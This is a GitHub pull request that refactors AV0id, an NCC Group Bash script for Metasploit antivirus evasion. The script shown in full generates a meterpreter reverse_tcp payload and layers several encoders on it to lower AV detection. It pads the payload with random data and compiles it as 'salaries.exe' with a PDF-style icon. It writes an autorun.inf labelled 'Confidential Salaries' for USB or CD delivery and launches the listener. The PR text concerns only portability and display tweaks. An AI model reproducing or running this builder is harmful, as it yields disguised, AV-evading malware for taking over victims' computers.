### PR TITLE
Compatibility for ArchAssault along with a few tweaks and improvements

### DIFF
--- a/avoid.sh
+++ b/avoid.sh
@@ -1,298 +1,240 @@
 #!/usr/bin/env bash
-# AV0id - Metapsloit Payload Anti-Virus Avasion
-# Daniel Compton
-# www.commonexploits.com
-# info@commexploits.com
-# Twitter = @commonexploits
-# 05/2013
-# Tested on Bactrack 5 and Kali only.
 
-#####################################################################################
-# Released as open source by NCC Group Plc - http://www.nccgroup.com/
+#######################################################################################
+#  AV0id - Metapsloit Payload Anti-Virus Avasion                                      #
+#                                                                                     #
+   VERSION="1.5"
+#######################################################################################
+#  Daniel Compton                                                                     #
+#                                                                                     #
+#  www.commonexploits.com                                                             #
+#                                                                                     #
+#  info@commexploits.com                                                              #
+#                                                                                     #
+#  Twitter = @commonexploits                                                          #
+#                                                                                     #
+#  05/2013                                                                            #
+#######################################################################################
+#  Released as open source by NCC Group Plc - http://www.nccgroup.com/                #
+#                                                                                     #
+#  Developed by Daniel Compton, daniel dot compton at nccgroup dot com                #
+#                                                                                     #
+#  https://github.com/nccgroup/metasploitavevasion                                    #
+#                                                                                     #
+#  Released under AGPL see LICENSE for more information                               #
+#######################################################################################
+#  Tested on Bactrack 5, Kali and ArchAssault                                         #
+#                                                                                     #
+#  Credit to other A.V. scripts & research by Astr0baby, Vanish3r & Hasan (inf0g33k)  #
+#######################################################################################
 
-# Developed by Daniel Compton, daniel dot compton at nccgroup dot com
 
-# https://github.com/nccgroup/metasploitavevasion
-
-#Released under AGPL see LICENSE for more information
-
-######################################################################################
-
-# Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k
-
-# User options
+#######################################################################################
+#  Settings                                                                           #
+#######################################################################################
 OUTPUTNAME="salaries.exe" # The payload exe created name
-MSFPAYLOAD=`which msfpayload` # Path to the msfpayload script
-MSFENCODE=`which msfencode` # Path to the msfencode script
-MSFCLI=`which msfcli` # Path to the msfcli script
+MSFPAYLOAD=`type -P msfpayload` # Path to the msfpayload script
+MSFENCODE=`type -P msfencode` # Path to the msfencode script
+MSFCLI=`type -P msfcli` # Path to the msfcli script
+
+# mingw32 gcc in system, likely: i586-mingw32msvc-gcc 'or' i686-w64-mingw32-gcc
+MINGW32="i686-w64-mingw32-gcc" 
 
 
-# Script begins
-#===============================================================================
-
-VERSION="1.5"
-
-# spinner for Metasploit Generator
+#######################################################################################
+#  Functions                                                                          #
+#######################################################################################
 spinlong ()
 {
-    bar=" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
+    # spinner for metasploit generator
+    bar=$(for i in `seq 1 $(expr $(tput cols) - 2)`; do echo -n "+"; done)
     barlength=${#bar}
     i=0
     while ((i < 100)); do
         n=$((i*barlength / 100))
         printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
         ((i += RANDOM%5+2))
-        sleep 0.02
+        sleep 0.1
     done
+    printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:$((100*barlength / 100))}"
 }
 
-
-# spinner for random seed generator
 spinlong2 ()
 {
-    bar=" 011001110010010011101110011010101010101101010010101110"
+    # spinner for random seed generator
+    bar=$(for i in `seq 1 $(expr $(tput cols) - 2)`; do [[ "`cat /dev/urandom | tr -dc '0-9' | fold -w 3 | head -n 1 | sed 's/^00//g;s/^0//g;s/^$/0/g'`" -gt 500 ]] && echo -n 0 || echo -n 1; done)
     barlength=${#bar}
     i=0
     while ((i < 100)); do
         n=$((i*barlength / 100))
         printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
         ((i += RANDOM%5+2))
-        sleep 0.02
+        sleep 0.05
     done
+    printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:$((100*barlength / 100))}"
 }
 
-clear
-echo ""
-echo -e "\e[00;32m##################################################################\e[00m"
-echo ""
-echo -e "*** \e[01;31mAV\e[00m\e[01;32m0id\e[00m - Metasploit Shell A.V. Avoider Version $VERSION  ***"
-echo ""
-echo -e "\e[00;32m##################################################################\e[00m"
-echo ""
-sleep 3
-clear
+header ()
+{
+    clear
+    echo -e -n "\n\e[00;32m"; for i in `seq 1 $(tput cols)`; do echo -n "#"; done; echo -e -n "\e[00m\n\n"
+    [[ $(tput cols) -gt 60 ]] && for i in `seq 1 $(expr $(expr $(tput cols) - 60) / 2)`; do echo -n " "; done
+    echo -e "*** \e[01;31mAV\e[00m\e[01;32m0id\e[00m -- Metasploit Shell A.V. Avoider Version $VERSION ***\n"
+    echo -e -n "\e[00;32m"; for i in `seq 1 $(tput cols)`; do echo -n "#"; done; echo -e -n "\e[00m\n\n"
+}
 
-#Check for gcc compiler
-which i586-mingw32msvc-gcc >/dev/null 2>&1
-if [ $? -eq 0 ]; then
-    echo ""
-else
-    echo ""
-    echo -e "\e[01;31m[!]\e[00m Unable to find the required gcc program, install i586-mingw32msvc-gcc and try again"
-    echo ""
+
+#######################################################################################
+#  Script                                                                             #
+#######################################################################################
+header
+# check for gcc compiler
+type -P $MINGW32 >/dev/null 2>&1
+if [ ! $? -eq 0 ]; then
+    echo -e "\n\e[01;31m[!]\e[00m Unable to find the required gcc program, install the package that provides ${MINGW32} and try again"
+    echo -e "\e[01;31m[!]\e[00m\t*NOTE: If this doesn't work and you have mingw32 gcc installed, you may need to set the MINGW32 variable in $0 to the location of the binary\n"
     exit 1
 fi
 
-#Check for Metasploit
-if [[ "$MSFPAYLOAD" != "" || "$MSFENCODE" != "" || "$MSFCLI" != "" ]]; then
-    echo ""
-else
-    echo ""
-    echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again"
-    echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options"
-    echo ""
+# check for metasploit
+if [[ "$MSFPAYLOAD" = "" || "$MSFENCODE" = "" || "$MSFCLI" = "" ]]; then
+    echo -e "\n\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again"
+    echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options\n"
     exit 1
 fi
 
-
-# create a PDF icon
-
-#Check for PDF icon files
-
-ls icons/icon.res >/dev/null 2>&1 && ls icons/autorun.ico >/dev/null 2>&1
-if [ $? -eq 0 ]; then
-    echo ""
-else
-    echo ""
-    echo -e "\e[01;31m[!]\e[00m I can't find the icon files I will need, I will try and download these now"
-    echo ""
-    sleep 2
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Attempting to download 2 files...please wait"
-    echo ""
-    mkdir icons >/dev/null 2>&1
+# check for pdf icon files and create them if they don't already exist
+[[ -f icons/icon.res ]] && [[ -f icons/autorun.ico ]]
+if [ ! $? -eq 0 ]; then
+    echo -e "\n\e[01;31m[!]\e[00m I can't find the icon files I will need, I will try and download these now\n"
+    install -d icons
     cd icons >/dev/null 2>&1
-    wget http://www.commonexploits.com/tools/avoid/icon.res >/dev/null 2>&1
-    wget http://www.commonexploits.com/tools/avoid/autorun.ico >/dev/null 2>&1
-    sleep 2
-    ls icon.res >/dev/null 2>&1 && ls autorun.ico >/dev/null 2>&1
-    if [ $? -eq 0 ]; then
-        echo -e "\e[01;32m[+]\e[00m Success, icon files downloaded"
-        cd ..
-        echo ""
-    else
-        echo -e "\e[01;31m[!]\e[00m Unable to download the icon files, script will continue but you will not have the masked PDF exe or autorun icon"
-        cd ..
-        echo ""
-    fi
+    echo -e -n "\n\e[01;32m[-]\e[00m Attempting to download 2 files... "
+    wget http://www.commonexploits.com/tools/avoid/icon.res >/dev/null 2>&1 && wget http://www.commonexploits.com/tools/avoid/autorun.ico >/dev/null 2>&1 && echo -e "\e[01;32m[+]\e[00m Success, icon files downloaded\n" || echo -e "\e[01;31m[!]\e[00m Unable to download the icon files, script will continue but you will not have the masked PDF exe or autorun icon\n"
 fi
 
-# Random Msfencode encoding iterations
-#ITER=`seq 5 10 |sort -R |sort -R | head -1`
-ITER=`shuf -i 10-20 -n 1`
-
-echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
-echo -e "\e[01;31m[?]\e[00m What system do you want the Metasploit listenter to run on? Enter 1 or 2 and press enter"
-echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
-echo ""
-echo " 1. Use my current system and IP address"
-echo ""
-echo " 2. Use an alternative system, i.e public external address"
-echo ""
-echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
-echo ""
+# random msfencode encoding iterations
+ITER=`shuf -i 10-20 -n 1` #ITER=`seq 5 10 |sort -R |sort -R | head -1`
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m"
+echo -e "\e[01;31m[?]\e[00m Choose how to select an address for the Metasploit listenter to run:"
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
+echo -e " 1. Automatic: Use the first non-loopback ipv4 address on the system\n"
+echo -e " 2. Manual: Specify the system address you would like to listen on"
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
 echo -ne "\e[01;32m>\e[00m "
 read INTEXT
-echo ""
+echo
+
+header
 if [ "$INTEXT" = "1" ]; then
-    echo ""
-    IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
-    IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }')
-    echo -e "\e[01;32m[-]\e[00m Local system selected, listener will be launched on \e[01;32m$IP\e[00m using interface \e[01;32m$IPINT\e[00m"
-    echo ""
-    echo -e "\e[1;31m-------------------------------------------------------\e[00m"
-    echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on?"
-    echo -e "\e[1;31m-------------------------------------------------------\e[00m"
-    echo ""
+    DEVADDR=$(ip addr | sed 's/^\ *link.*//g;s/^\ *valid.*//g;s/^\ *inet//g;s/^6.*/^/g;s/:\ <.*//g;s/\/[0-9]*.*//g;s/^[0-9]*:\ /\$/g' | sed ':a;N;$!ba;s/\n/\^/g;s/\ *//g;s/127\.0\.0\.1//g' | grep --color=never -o -e "\$[^\^]*\^\^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*" | head -n 1)
+    IPINT=$(echo $DEVADDR | sed 's/^\$//g;s/\^.*//g')
+    IP=$(echo $DEVADDR | sed 's/^[^\^]*\^*//g;')
+    echo -e "\e[01;32m[-]\e[00m Automatic selection chosen\n\n    The listener will be launched on...\n\tInterface: \e[01;32m${IPINT}\e[00m\n\tAddress: \e[01;32m${IP}\e[00m\n"
+    echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m"
+    echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on?\n    Hint: If on the internet, try port 53 if restricted"
+    echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
     echo -ne "\e[01;32m>\e[00m "
     read PORT
-    echo ""
+    echo
 elif [ "$INTEXT" = "2" ]; then
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Alternative system selected"
-    echo ""
-    echo -e "\e[1;31m--------------------------------------------------------------------\e[00m"
+    echo -e "\e[01;32m[-]\e[00m Alternative system selected\n"
+    echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m"
     echo -e "\e[01;31m[?]\e[00m What IP address to you want the listener to run on?"
-    echo -e "\e[1;31m--------------------------------------------------------------------\e[00m"
-    echo ""
+    echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
     echo -ne "\e[01;32m>\e[00m "
     read IP
-    echo ""
-    echo ""
-    echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
-    echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on? If on the internet try port 53 if restricted"
-    echo -e "\e[1;31m---------------------------------------------------------------------------------------------------------\e[00m"
-    echo ""
+    echo -e -n "\n\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m"
+    echo -e "\e[01;31m[?]\e[00m What port number do you want to listen on?\n    Hint: If on the internet, try port 53 if restricted"
+    echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
     echo -ne "\e[01;32m>\e[00m "
     read PORT
-    echo ""
+    echo
 else
-    echo -e "\e[01;31m[!]\e[00m You didnt select a valid option, try again"
-    echo ""
+    echo -e "\e[01;31m[!]\e[00m You didnt select a valid option, try again\n"
     exit 1
 fi
-echo ""
-echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..."
-echo ""
+
+header
+echo -e "\n\e[02;32m[-]\e[00m Generating Metasploit payload, please wait..."
 spinlong
-#Payload creater
+
+# payload creater
 $MSFPAYLOAD windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$PORT" EXITFUNC=thread R | $MSFENCODE -e x86/shikata_ga_nai -c $ITER -t raw 2>/dev/null | $MSFENCODE -e x86/jmp_call_additive -c $ITER -t raw 2>/dev/null | $MSFENCODE -e x86/call4_dword_xor -c $ITER -t raw 2>/dev/null |  $MSFENCODE -e x86/shikata_ga_nai -c $ITER -t c > msf.c 2>/dev/null
-echo ""
-echo ""
-# Menu
-echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
-echo -e "\e[01;31m[?]\e[00m How stealthy do you want the file? Enter 1, 2, 3, 4 or 5 and press enter"
-echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
-echo ""
-echo " 1. Normal - about 400K payoad  - fast compile - 13/46 A.V. products detected as malicious"
-echo ""
-echo " 2. Stealth - about 1-2 MB payload - fast compile - 12/46 A.V. products detected as malicious"
-echo ""
-echo " 3. Super Stealth - about 10-20MB payload - fast compile - 11/46 A.V. detected as malicious"
-echo ""
-echo " 4. Insane Stealth - about 50MB payload - slower compile - 10/46 A.V. detected as malicious"
-echo ""
-echo " 5. Desperate Stealth - about 100MB payload - slower compile - Not tested with A.V."
-echo ""
-echo -e "\e[1;31m----------------------------------------------------------------------------------------------\e[00m"
-echo ""
+
+# menu
+header
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m"
+echo -e "\e[01;31m[?]\e[00m How stealthy do you want the file?"
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
+echo -e " 1. Normal - about 400K payoad  - fast compile - 13/46 A.V. products detected as malicious\n"
+echo -e " 2. Stealth - about 1-2 MB payload - fast compile - 12/46 A.V. products detected as malicious\n"
+echo -e " 3. Super Stealth - about 10-20MB payload - fast compile - 11/46 A.V. detected as malicious\n"
+echo -e " 4. Insane Stealth - about 50MB payload - slower compile - 10/46 A.V. detected as malicious\n"
+echo -e " 5. Desperate Stealth - about 100MB payload - slower compile - Not tested with A.V."
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
 echo -ne "\e[01;32m>\e[00m "
 read LEVEL
-echo ""
+echo
+
+header
 if [ "$LEVEL" = "1" ]; then
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds"
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
-    echo ""
+    echo -e "\n\e[01;32m[-]\e[00m Normal selected, please wait a few seconds\n"
+    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait\n"
     spinlong2
     SEED=$(shuf -i 100000-500000 -n 1)
 elif [ "$LEVEL" = "2" ]; then
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds"
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
-    echo ""
+    echo -e "\n\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds\n"
+    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait\n"
     spinlong2
     SEED=$(shuf -i 1000000-5000000 -n 1)
 elif [ "$LEVEL" = "3" ]; then
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds"
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
-    echo ""
+    echo -e "\n\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds\n"
+    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait\n"
     spinlong2
     SEED=$(shuf -i 8000000-12000000 -n 1)
 elif [ "$LEVEL" = "4" ]; then
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes"
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
-    echo ""
+    echo -e "\n\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes\n"
+    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait\n"
     spinlong2
     SEED=$(shuf -i 40000000-60000000 -n 1)
 elif [ "$LEVEL" = "5" ]; then
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes"
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
-    echo ""
+    echo -e "\n\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes\n"
+    echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait\n"
     spinlong2
     SEED=$(shuf -i 100000000-200000000 -n 1)
 else
-    echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting"
-    echo ""
+    echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting\n"
     exit 1
 fi
 
 # build the c file ready for compile
-echo ""
+echo
 echo '#include <stdio.h>' >> build.c
 echo 'unsigned char padding[]=' >> build.c
 cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random
 sed -i 's/$/"/' random
 sed -i 's/^/"/' random
 cat random >> build.c
-echo  ';' >> build.c
+echo ';' >> build.c
 echo 'char payload[] =' >> build.c
 cat msf.c |grep -v "unsigned" >> build.c
 echo 'char comment[512] = "";' >> build.c
 echo 'int main(int argc, char **argv) {' >> build.c
-echo  '	(*(void (*)()) payload)();' >> build.c
+echo '	(*(void (*)()) payload)();' >> build.c
 echo '	return(0);' >> build.c
 echo '}' >> build.c
 
 # gcc compile the exploit
-
-ls icons/icon.res >/dev/null 2>&1
-if [ $? -eq 0 ]; then
-    i586-mingw32msvc-gcc -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME"
-else
-    i586-mingw32msvc-gcc -Wall -mwindows build.c -o "$OUTPUTNAME"
-fi
+[[ -f icons/icon.res ]] \
+    && $MINGW32 -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME" \
+    || $MINGW32 -Wall -mwindows build.c -o "$OUTPUTNAME"
 
 # check if file built correctly
 LOCATED=`pwd`
-ls "$OUTPUTNAME" >/dev/null 2>&1
-if [ $? -eq 0 ]; then
-    echo ""
-    echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m"
-else
-    echo ""
-    echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting"
-    echo ""
-    exit 1
-fi
+[[ -e "$OUTPUTNAME" ]] \
+    && echo -e "\n\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m" \
+    || (echo -e "\n\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting\n"; exit 1)
 
 # create autorun files
 mkdir autorun >/dev/null 2>&1
@@ -302,42 +244,33 @@ echo "[autorun]" > autorun/autorun.inf
 echo "open="$OUTPUTNAME"" >> autorun/autorun.inf
 echo "icon=autorun.ico" >> autorun/autorun.inf
 echo "label=Confidential Salaries" >> autorun/autorun.inf
-echo ""
-echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB"
+echo -e "\n\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB\n"
 
 # clean up temp files
 rm build.c >/dev/null 2>&1
 rm random >/dev/null 2>&1
 rm msf.c >/dev/null 2>&1
 
-
-echo ""
-sleep 2
-echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
-echo -e "\e[01;31m[?]\e[00m Do you want the listener to be loaded automatically? Enter 1 or 2 and press enter"
-echo -e "\e[1;31m--------------------------------------------------------------------------------------------\e[00m"
-echo ""
-echo " 1. Yes"
-echo ""
-echo " 2. No"
-echo ""
-echo -e "\e[1;31m----------------------------------------------------------------------------------------------\e[00m"
-echo ""
+header
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m"
+echo -e "\e[01;31m[?]\e[00m Do you want the listener to be loaded immediately?"
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
+echo -e " 1. Yes, display the command to start the listener and run it now\n"
+echo -e " 2. No, display the command to start the listener exit"
+echo -e -n "\e[1;31m"; for i in `seq 1 $(tput cols)`; do echo -n "-"; done; echo -e -n "\e[00m\n"
 echo -ne "\e[01;32m>\e[00m "
 read INTEXT
-echo ""
+echo
+
+header
+# display the command to run the listener
+echo -e -n "\e[01;32m"; for i in `seq 1 $(tput cols)`; do echo -n "+"; done; echo -e -n "\e[00m\n"
+echo -e "\e[01;32m[-]\e[00m Run the following command to manually start the listener at a later date:"
+echo -e "\n  ${MSFCLI} \\\\\n\texploit/multi/handler \\\\\n\tPAYLOAD=windows/meterpreter/reverse_tcp \\\\\n\tLHOST=\"$IP\" \\\\\n\tLPORT=\"$PORT\" \\\\\n\tE"
+echo -e -n "\e[01;32m"; for i in `seq 1 $(tput cols)`; do echo -n "+"; done; echo -e -n "\e[00m\n\n"
+
+# run the command if the user chose to load the listener
 if [ "$INTEXT" = "1" ]; then
-    echo -e "\e[01;32m[-]\e[00m Loading the Metasploit listener on \e[01;32m$IP:$PORT\e[00m, please wait..."
-    echo ""
+    echo -e "\e[01;32m[-]\e[00m Loading the Metasploit listener on \e[01;32m${IP}:${PORT}\e[00m, please wait...\n"
     $MSFCLI exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$PORT" E 2>/dev/null
-else
-    echo ""
-    echo -e "\e[01;32m[-]\e[00m Run the following code on your listener system:"
-    echo ""
-    echo -e "\e[01;32m+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m"
-    echo ""
-    echo "$MSFCLI exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST="$IP" LPORT="$PORT" E"
-    echo ""
-    echo -e "\e[01;32m+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\e[00m"
-    echo ""
 fi


### PR DESCRIPTION
From Commit:

Changed the title, progress bars and horizontal bars to render based on the terminal width. Switched a bunch of commands to more distro-agnostic equivalents (eg: which -> type -P), changed mingw gcc to be configurable as there was a rather dramatic change to the command name a little while ago that places some distros with the old one and some with the new, depending on update cycle. changed 'ifconfig' (net-tools) to use its successor 'ip' (iproute2) instead. got rid of a bunch of redundant echos using, including a bunch in if/else statements that were easily pulled out and that part of the if statement removed when the condition was switched with its inverse. cleaned language up a bit when it seemed like more could be added, or I didn't understand what something meant initially. the manual command is now provided when running it too, in case someone wants to both start it now and know how to start it again later. there are probably other little things I'm not remembering too, and feel free to pick and choose if you don't want everything.
